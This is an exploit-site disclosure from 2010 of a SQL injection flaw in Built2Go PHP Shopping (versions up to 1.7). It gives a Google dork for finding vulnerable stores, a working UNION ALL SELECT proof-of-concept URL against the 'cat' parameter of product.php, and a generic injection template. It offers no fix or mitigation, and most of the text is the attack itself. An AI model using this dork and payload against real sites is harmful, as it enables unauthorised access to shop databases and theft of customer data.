Built2Go PHP Shopping SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Built2Go PHP Shopping SQL Injection Vulnerability
# Published : 2010-12-23
# Author : Br0ly
# Previous Title : OpenAuto 1.6.3 Multiple Vulnerabilities
# Next Title : Interact 2.4.1 SQL Injection Vulnerability

Script Name: Built2Go PHP Shopping  ( version ) <= 1.7
Site: http://built2go.com/
Script Demo: http://demos.built2go.com/shopping/1/
Found: Br0ly
Google Dork: "Powered by Built2Go PHP Shopping"

p0c:

http://server.com/product.php?cat=16'%20UNION%20ALL%20SELECT%201,@@version,3/*

xPloit:

http://server.com/product.php?cat=[sqli]

Brazil ;D